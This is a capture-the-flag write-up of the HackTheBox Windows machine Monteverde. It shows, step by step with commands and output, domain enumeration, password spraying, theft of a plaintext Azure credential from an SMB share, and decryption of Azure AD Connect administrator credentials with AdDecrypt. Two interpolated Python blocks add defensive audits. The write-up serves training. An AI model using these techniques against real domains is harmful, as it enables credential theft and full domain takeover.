Monteverde is one of the machines currently available on the HackTheBox hacking platform and is rated medium difficulty.
In this case it is a machine based on the Windows operating system.
Port scanning
As usual, we add the IP of the Monteverde machine, 10.10.10.172, to /etc/hosts as monteverde.htb and begin with the nmap port scan.
```
# Nmap 7.80 scan initiated Wed May 13 20:58:16 2020 as: nmap -sV -sC -Pn -p- -oA monteverde-nmap 10.10.10.172
Nmap scan report for 10.10.10.172
Host is up (0.058s latency).
Not shown: 65518 filtered ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-05-13 17:15:24Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49675/tcp open  msrpc         Microsoft Windows RPC
49706/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=5/13%Time=5EBBC5B3%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -46m59s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-05-13T09:17:49
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed May 13 21:07:26 2020 -- 1 IP address (1 host up) scanned in 549.58 seconds
```
We find several open ports belonging to different services. We will keep enumerating the system to learn more about them.
Enumeration
We start the enumeration with enum4linux, trying to discover information about the domain and the existing users:
```
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed May 13 20:59:40 2020

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.10.10.172
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

 ==================================================== 
|    Enumerating Workgroup/Domain on 10.10.10.172    |
 ==================================================== 
[E] Can't find workgroup/domain

 ============================================ 
|    Nbtstat Information for 10.10.10.172    |
 ============================================ 
Looking up status of 10.10.10.172
No reply from 10.10.10.172

 ===================================== 
|    Session Check on 10.10.10.172    |
 ===================================== 
[+] Server 10.10.10.172 allows sessions using username '', password ''
[+] Got domain/workgroup name: 

 =========================================== 
|    Getting domain SID for 10.10.10.172    |
 =========================================== 
Domain Name: MEGABANK
Domain Sid: S-1-5-21-391775091-850290835-3566037492
[+] Host is part of a domain (not a workgroup)

 ====================================== 
|    OS information on 10.10.10.172    |
 ====================================== 
[+] Got OS info for 10.10.10.172 from smbclient: 
[+] Got OS info for 10.10.10.172 from srvinfo:
Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED

 ============================= 
|    Users on 10.10.10.172    |
 ============================= 
index: 0xfb6 RID: 0x450 acb: 0x00000210 Account: AAD_987d7f2f57d2    Name: AAD_987d7f2f57d2    Desc: Service account for the Synchronization Service with installation identifier 05c97990-7587-4a3d-b312-309adfc172d9 running on computer MONTEVERDE.
index: 0xfd0 RID: 0xa35 acb: 0x00000210 Account: dgalanos    Name: Dimitris Galanos    Desc: (null)
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest    Name: (null)    Desc: Built-in account for guest access to the computer/domain
index: 0xfc3 RID: 0x641 acb: 0x00000210 Account: mhope    Name: Mike Hope    Desc: (null)
index: 0xfd1 RID: 0xa36 acb: 0x00000210 Account: roleary    Name: Ray O'Leary    Desc: (null)
index: 0xfc5 RID: 0xa2a acb: 0x00000210 Account: SABatchJobs    Name: SABatchJobs    Desc: (null)
index: 0xfd2 RID: 0xa37 acb: 0x00000210 Account: smorgan    Name: Sally Morgan    Desc: (null)
index: 0xfc6 RID: 0xa2b acb: 0x00000210 Account: svc-ata    Name: svc-ata    Desc: (null)
index: 0xfc7 RID: 0xa2c acb: 0x00000210 Account: svc-bexec    Name: svc-bexec    Desc: (null)
index: 0xfc8 RID: 0xa2d acb: 0x00000210 Account: svc-netapp    Name: svc-netapp    Desc: (null)

user:[Guest] rid:[0x1f5]
user:[AAD_987d7f2f57d2] rid:[0x450]
user:[mhope] rid:[0x641]
user:[SABatchJobs] rid:[0xa2a]
user:[svc-ata] rid:[0xa2b]
user:[svc-bexec] rid:[0xa2c]
user:[svc-netapp] rid:[0xa2d]
user:[dgalanos] rid:[0xa35]
user:[roleary] rid:[0xa36]
user:[smorgan] rid:[0xa37]

 ========================================= 
|    Share Enumeration on 10.10.10.172    |
 ========================================= 

    Sharename       Type      Comment
    ---------       ----      -------
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on 10.10.10.172

 ==================================================== 
|    Password Policy Information for 10.10.10.172    |
 ==================================================== 
[+] Attaching to 10.10.10.172 using a NULL share

[+] Trying protocol 139/SMB...

    [!] Protocol failed: Cannot request session (Called Name:10.10.10.172)

[+] Trying protocol 445/SMB...

[+] Found domain(s):

    [+] MEGABANK
    [+] Builtin

[+] Password Info for Domain: MEGABANK

    [+] Minimum password length: 7
    [+] Password history length: 24
    [+] Maximum password age: 41 days 23 hours 53 minutes 
    [+] Password Complexity Flags: 000000

        [+] Domain Refuse Password Change: 0
        [+] Domain Password Store Cleartext: 0
        [+] Domain Password Lockout Admins: 0
        [+] Domain Password No Clear Change: 0
        [+] Domain Password No Anon Change: 0
        [+] Domain Password Complex: 0

    [+] Minimum password age: 1 day 4 minutes 
    [+] Reset Account Lockout Counter: 30 minutes 
    [+] Locked Account Duration: 30 minutes 
    [+] Account Lockout Threshold: None
    [+] Forced Log off Time: Not Set

[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 7

 ============================== 
|    Groups on 10.10.10.172    |
 ============================== 

[+] Getting builtin groups:
group:[Pre-Windows 2000 Compatible Access] rid:[0x22a]
group:[Incoming Forest Trust Builders] rid:[0x22d]
group:[Windows Authorization Access Group] rid:[0x230]
group:[Terminal Server License Servers] rid:[0x231]
group:[Users] rid:[0x221]
group:[Guests] rid:[0x222]
group:[Remote Desktop Users] rid:[0x22b]
group:[Network Configuration Operators] rid:[0x22c]
group:[Performance Monitor Users] rid:[0x22e]
group:[Performance Log Users] rid:[0x22f]
group:[Distributed COM Users] rid:[0x232]
group:[IIS_IUSRS] rid:[0x238]
group:[Cryptographic Operators] rid:[0x239]
group:[Event Log Readers] rid:[0x23d]
group:[Certificate Service DCOM Access] rid:[0x23e]
group:[RDS Remote Access Servers] rid:[0x23f]
group:[RDS Endpoint Servers] rid:[0x240]
group:[RDS Management Servers] rid:[0x241]
group:[Hyper-V Administrators] rid:[0x242]
group:[Access Control Assistance Operators] rid:[0x243]
group:[Remote Management Users] rid:[0x244]
group:[Storage Replica Administrators] rid:[0x246]

[+] Getting builtin group memberships:
Group 'Pre-Windows 2000 Compatible Access' (RID: 554) has member: Couldn't lookup SIDs
Group 'Remote Management Users' (RID: 580) has member: Couldn't lookup SIDs
Group 'Guests' (RID: 546) has member: Couldn't lookup SIDs
Group 'Users' (RID: 545) has member: Couldn't lookup SIDs
Group 'Windows Authorization Access Group' (RID: 560) has member: Couldn't lookup SIDs
Group 'IIS_IUSRS' (RID: 568) has member: Couldn't lookup SIDs

[+] Getting local groups:
group:[Cert Publishers] rid:[0x205]
group:[RAS and IAS Servers] rid:[0x229]
group:[Allowed RODC Password Replication Group] rid:[0x23b]
group:[Denied RODC Password Replication Group] rid:[0x23c]
group:[DnsAdmins] rid:[0x44d]
group:[SQLServer2005SQLBrowserUser$MONTEVERDE] rid:[0x44f]
group:[ADSyncAdmins] rid:[0x451]
group:[ADSyncOperators] rid:[0x452]
group:[ADSyncBrowse] rid:[0x453]
group:[ADSyncPasswordSet] rid:[0x454]

[+] Getting local group memberships:
Group 'ADSyncAdmins' (RID: 1105) has member: Couldn't lookup SIDs
Group 'Denied RODC Password Replication Group' (RID: 572) has member: Couldn't lookup SIDs

[+] Getting domain groups:
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Azure Admins] rid:[0xa29]
group:[File Server Admins] rid:[0xa2e]
group:[Call Recording Admins] rid:[0xa2f]
group:[Reception] rid:[0xa30]
group:[Operations] rid:[0xa31]
group:[Trading] rid:[0xa32]
group:[HelpDesk] rid:[0xa33]
group:[Developers] rid:[0xa34]

[+] Getting domain group memberships:
Group 'HelpDesk' (RID: 2611) has member: MEGABANK\roleary
Group 'Group Policy Creator Owners' (RID: 520) has member: MEGABANK\Administrator
Group 'Domain Users' (RID: 513) has member: MEGABANK\Administrator
Group 'Domain Users' (RID: 513) has member: MEGABANK\krbtgt
Group 'Domain Users' (RID: 513) has member: MEGABANK\AAD_987d7f2f57d2
Group 'Domain Users' (RID: 513) has member: MEGABANK\mhope
Group 'Domain Users' (RID: 513) has member: MEGABANK\SABatchJobs
Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-ata
Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-bexec
Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-netapp
Group 'Domain Users' (RID: 513) has member: MEGABANK\dgalanos
Group 'Domain Users' (RID: 513) has member: MEGABANK\roleary
Group 'Domain Users' (RID: 513) has member: MEGABANK\smorgan
Group 'Operations' (RID: 2609) has member: MEGABANK\smorgan
Group 'Azure Admins' (RID: 2601) has member: MEGABANK\Administrator
Group 'Azure Admins' (RID: 2601) has member: MEGABANK\AAD_987d7f2f57d2
Group 'Azure Admins' (RID: 2601) has member: MEGABANK\mhope
Group 'Trading' (RID: 2610) has member: MEGABANK\dgalanos
Group 'Domain Guests' (RID: 514) has member: MEGABANK\Guest

 ======================================================================= 
|    Users on 10.10.10.172 via RID cycling (RIDS: 500-550,1000-1050)    |
 ======================================================================= 
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED.  RID cycling not possible.

 ============================================= 
|    Getting printer info for 10.10.10.172    |
 ============================================= 
Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED
enum4linux complete on Wed May 13 21:01:38 2020
```
We have obtained a list of the users existing on the system, the domain name, and some other relevant information.
After going around in circles for a while, we build a dictionary of usernames and passwords from the data gathered so far and use the CrackMapExec tool to check whether the password of any of these users is in our dictionary.
Only the final result is shown, because of its size:
```
$ cme smb 10.10.10.172 -U list-users.txt -P passwords.txt
SMB         10.10.10.172    445    MONTEVERDE       [*] Windows 10.0 Build 17763 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.172    445    MONTEVERDE       [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs 
```
And we find that the password of the SABatchJobs user is the username itself, so we have run into a rather lazy sysadmin, and a situation that could perfectly well occur on a real machine.
With the access obtained, we try to log into the machine but cannot, so we continue enumerating.
Since the check was performed against SMB, we verify whether we can connect to it with the credentials obtained:
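The enum4linux output above already explains why this foothold was possible: a null session exposed the account list, and the password policy has no lockout threshold, no complexity requirement and a seven-character minimum. As an added example (not part of the original writeup), a small Python audit that parses that output and turns those settings into a remediation list; the sample input is a constructed excerpt of the scan shown above and the 12-character length baseline is an assumption.

```python
import re
from typing import Dict, List

# Constructed excerpt of the enum4linux 0.8.9 output shown above; the values
# are the ones the scan returned, trimmed to the lines the audit needs.
SAMPLE_OUTPUT = """
[+] Server 10.10.10.172 allows sessions using username '', password ''
user:[Guest] rid:[0x1f5]
user:[mhope] rid:[0x641]
user:[SABatchJobs] rid:[0xa2a]
user:[svc-ata] rid:[0xa2b]
[+] Password Info for Domain: MEGABANK
[+] Minimum password length: 7
[+] Password history length: 24
[+] Domain Password Complex: 0
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
"""

# Assumed baseline used by the audit (not a value from the page).
MIN_PASSWORD_LENGTH = 12

USER_RE = re.compile(r"user:\[([^\]]+)\]\s+rid:\[(0x[0-9a-fA-F]+)\]")
POLICY_RE = re.compile(r"^\[\+\]\s+([^:]+):\s*(.*)$")
NULL_SESSION_RE = re.compile(r"allows sessions using username '', password ''")


def parse_users(text: str) -> Dict[str, int]:
    """Map each account enumerated over the null session to its RID."""
    return {name: int(rid, 16) for name, rid in USER_RE.findall(text)}


def parse_policy(text: str) -> Dict[str, str]:
    """Collect the '[+] Key: Value' policy lines into a dict keyed as printed."""
    policy: Dict[str, str] = {}
    for line in text.splitlines():
        m = POLICY_RE.match(line.strip())
        if m:
            policy[m.group(1).strip()] = m.group(2).strip()
    return policy


def audit(text: str) -> List[str]:
    """Return the weaknesses a defender should fix, derived from the scan output."""
    findings: List[str] = []
    users = parse_users(text)
    if NULL_SESSION_RE.search(text):
        findings.append(f"null SMB session accepted; {len(users)} accounts enumerated anonymously")
    policy = parse_policy(text)
    length = int(policy.get("Minimum password length", "0") or 0)
    if length < MIN_PASSWORD_LENGTH:
        findings.append(f"minimum password length {length} is below {MIN_PASSWORD_LENGTH}")
    if policy.get("Domain Password Complex", "0") == "0":
        findings.append("password complexity is disabled")
    threshold = policy.get("Account Lockout Threshold", "None")
    if threshold.lower() in ("none", "0"):
        findings.append("no account lockout threshold: online password guessing is unthrottled")
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_OUTPUT):
        print("-", finding)
```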
```
$ smbclient -L \\\\10.10.10.172 -U SABatchJobs
Enter WORKGROUP\SABatchJobs's password: 

    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    azure_uploads   Disk      
    C$              Disk      Default share
    E$              Disk      Default share
    IPC$            IPC       Remote IPC
    NETLOGON        Disk      Logon server share 
    SYSVOL          Disk      Logon server share 
    users$          Disk      
SMB1 disabled -- no workgroup available
```
It works, so we explore the existing content to see whether we can find more information or other credentials.
We check access to the different shares and get it on the users$ share:
```
smbclient \\\\10.10.10.172\\users$ -U SABatchJobs
Enter WORKGROUP\SABatchJobs's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Jan  3 14:12:48 2020
  ..                                  D        0  Fri Jan  3 14:12:48 2020
  dgalanos                            D        0  Fri Jan  3 14:12:30 2020
  mhope                               D        0  Fri Jan  3 14:41:18 2020
  roleary                             D        0  Fri Jan  3 14:10:30 2020
  smorgan                             D        0  Fri Jan  3 14:10:24 2020

        524031 blocks of size 4096. 519955 blocks available
smb: \> 
```
Looking through it, we find a file in the home directory of user mhope, so we download it:
```
smb: \mhope\> ls
  .                                   D        0  Fri Jan  3 14:41:18 2020
  ..                                  D        0  Fri Jan  3 14:41:18 2020
  azure.xml                          AR     1212  Fri Jan  3 14:40:23 2020

        524031 blocks of size 4096. 519955 blocks available
smb: \mhope\> get azure.xml
getting file \mhope\azure.xml of size 1212 as azure.xml (2,6 KiloBytes/sec) (average 3,6 KiloBytes/sec)
smb: \mhope\> 
```
Its content is the following:
```
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">4n0therD4y@n0th3r$</S>
    </Props>
  </Obj>
</Objs>
```
In this file we find credentials that we assume belong to the user mhope, so next we try to access the machine with that user.
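The file is a PowerShell Export-Clixml serialization, and the Password property is stored as a plain <S> string, which is what makes it readable by anyone with access to the share. As an added example (not the author's or any project's code), a Python scanner that parses a Clixml file, reports objects whose secret-named properties are plaintext <S> strings versus DPAPI-protected <SS> SecureStrings, and never prints the value itself; the sample document is constructed in the same layout with a placeholder password, and the list of secret property names is an assumption.

```python
import xml.etree.ElementTree as ET
from typing import Dict, List

PS_NS = "http://schemas.microsoft.com/powershell/2004/04"
NS = f"{{{PS_NS}}}"

# Property names that should never be serialized as a plain string (assumed list).
SECRET_PROPS = {"password", "secret", "clientsecret", "token", "accesskey"}

# Constructed sample with the same layout as the azure.xml found on the share;
# the password value is a placeholder, not the real one.
SAMPLE_CLIXML = f"""<Objs Version="1.1.0.1" xmlns="{PS_NS}">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">PLACEHOLDER-SECRET</S>
    </Props>
  </Obj>
</Objs>"""


def scan_clixml(xml_text: str) -> Dict[str, List[Dict[str, object]]]:
    """Classify secret-named properties of every serialized object.

    <S> is a plain string, so a secret in it is readable by anyone who can read
    the file. <SS> is a SecureString, which Export-Clixml stores DPAPI-encrypted
    and is the form a credential should take. Values are never returned, only
    their length, so the report itself does not leak the secret.
    """
    root = ET.fromstring(xml_text)
    result: Dict[str, List[Dict[str, object]]] = {"plaintext": [], "protected": []}
    for obj in root.iter(f"{NS}Obj"):
        type_names = [t.text or "" for t in obj.findall(f"{NS}TN/{NS}T")]
        props = obj.find(f"{NS}Props")
        if props is None:
            continue
        for prop in props:
            name = prop.get("N", "")
            tag = prop.tag.replace(NS, "")
            if name.lower() not in SECRET_PROPS or tag not in ("S", "SS"):
                continue
            record = {
                "type": type_names[0] if type_names else "unknown",
                "property": name,
                "length": len(prop.text or ""),
            }
            result["plaintext" if tag == "S" else "protected"].append(record)
    return result


def report(xml_text: str) -> List[str]:
    """Human-readable findings for a scanned file, plaintext hits first."""
    scanned = scan_clixml(xml_text)
    lines = [f"plaintext {r['property']} ({r['length']} chars) in {r['type']}"
             for r in scanned["plaintext"]]
    lines += [f"protected {r['property']} in {r['type']}" for r in scanned["protected"]]
    return lines


if __name__ == "__main__":
    for line in report(SAMPLE_CLIXML):
        print("-", line)
```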
Getting the user flag
With the credentials obtained for user mhope, we log in using the evil-winrm tool:
```
$ ruby evil-winrm.rb -i 10.10.10.172 -u mhope -p "4n0therD4y@n0th3r$"

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\mhope\Documents> whoami
megabank\mhope
*Evil-WinRM* PS C:\Users\mhope\Documents> cd ..\desktop
*Evil-WinRM* PS C:\Users\mhope\desktop> dir


    Directory: C:\Users\mhope\desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         1/3/2020   5:48 AM             32 user.txt


*Evil-WinRM* PS C:\Users\mhope\desktop> 
```
And we have the user.txt flag in the desktop directory of mhope's home.
Privilege escalation
Now we review the available options for escalating privileges.
We look at the permissions and groups of user mhope:
```
*Evil-WinRM* PS C:\users\mhope\documents> whoami /all

USER INFORMATION
----------------

User Name      SID
============== ============================================
megabank\mhope S-1-5-21-391775091-850290835-3566037492-1601


GROUP INFORMATION
-----------------

Group Name                                  Type             SID                                          Attributes
=========================================== ================ ============================================ ==================================================
Everyone                                    Well-known group S-1-1-0                                      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                     Mandatory group, Enabled by default, Enabled group
MEGABANK\Azure Admins                       Group            S-1-5-21-391775091-850290835-3566037492-2601 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\users\mhope\documents> 
```
And we find something interesting: the user belongs to the MEGABANK\Azure Admins group, which might give us a lead or a way to escalate privileges.
We keep investigating and notice that there is a .Azure directory in the user's home, where various data and the token cache of the Azure connection are stored.
```
*Evil-WinRM* PS C:\users\mhope> ls


    Directory: C:\users\mhope


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         1/3/2020   5:35 AM                .Azure
d-r---         1/3/2020   5:24 AM                3D Objects
d-r---         1/3/2020   5:24 AM                Contacts
d-r---         1/3/2020   5:47 AM                Desktop
d-r---        5/13/2020   2:09 AM                Documents
d-r---        5/12/2020  10:39 PM                Downloads
d-r---         1/3/2020   5:24 AM                Favorites
d-r---         1/3/2020   5:24 AM                Links
d-r---         1/3/2020   5:24 AM                Music
d-r---         1/3/2020   5:24 AM                Pictures
d-r---         1/3/2020   5:24 AM                Saved Games
d-r---         1/3/2020   5:24 AM                Searches
d-r---         1/3/2020   5:24 AM                Videos


*Evil-WinRM* PS C:\users\mhope> 
```
With what we have discovered so far, we search Google and find several posts explaining how to escalate privileges on Windows with a user belonging to this group, among which we highlight the post Azure AD Connect Database Exploit (Priv Esc).
In our case we reviewed everything in depth to understand the vulnerability properly, but here we will only go through the steps taken to exploit it.
For a better understanding: the vulnerability allows running .NET or PowerShell code on the server where Azure AD Connect is installed to obtain the cleartext credentials of any AD account it is configured to use.
So we download the exe file from the ADSyncDecrypt GitHub repository.
And we upload the files AdDecrypt.exe and mcrypt.dll to the machine. For it to work correctly, both files must be placed in the same folder:
```
*Evil-WinRM* PS C:\Users\mhope\Documents> upload /home/asdf/github/addecrypt/AdDecrypt.exe c:\users\mhope\documents
Info: Uploading /home/asdf/github/addecrypt/AdDecrypt.exe to c:\users\mhope\documents

Data: 19796 bytes of 19796 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\Users\mhope\Documents> upload /home/asdf/github/addecrypt/mcrypt.dll c:\users\mhope\documents
Info: Uploading /home/asdf/github/addecrypt/mcrypt.dll to c:\users\mhope\documents

Data: 334248 bytes of 334248 bytes copied

Info: Upload successful!
```
Once the upload is complete, we need to move to the path where the binaries of the Microsoft Azure AD Sync program are located:
```
*Evil-WinRM* PS C:\Users\mhope\Documents> cd "C:\Program Files\Microsoft Azure AD Sync\Bin"
cd "C:\Program Files\Microsoft Azure AD Sync\Bin"
*Evil-WinRM* PS C:\Program Files\Microsoft Azure AD Sync\Bin> 
```
And we run the executable, giving its full path, and obtain the credentials of the administrator account used for the Azure connection:
```
*Evil-WinRM* PS C:\Program Files\Microsoft Azure AD Sync\Bin> c:\users\mhope\documents\AdDecrypt.exe -FullSQL

======================
AZURE AD SYNC CREDENTIAL DECRYPTION TOOL
Based on original code from: https://github.com/fox-it/adconnectdump
======================

Opening database connection...
Executing SQL commands...
Closing database connection...
Decrypting XML...
Parsing XML...
Finished!

DECRYPTED CREDENTIALS:
Username: administrator
Password: d0m@in4dminyeah!
Domain: MEGABANK.LOCAL
```
Getting the root flag
With the administrator credentials obtained, all that remains is to log into the machine with that user and get our flag:
```
$ ruby evil-winrm.rb -i 10.10.10.172 -u administrator -p "d0m@in4dminyeah!"

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
megabank\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd desktop
*Evil-WinRM* PS C:\Users\Administrator\desktop> dir


    Directory: C:\Users\Administrator\desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         1/3/2020   5:48 AM             32 root.txt


*Evil-WinRM* PS C:\Users\Administrator\desktop> 
```
And we have our root flag, completing this machine and earning our points.
If you are a HackTheBox user and liked my writeup, please give me respect at the following link: https://www.hackthebox.eu/home/users/profile/103792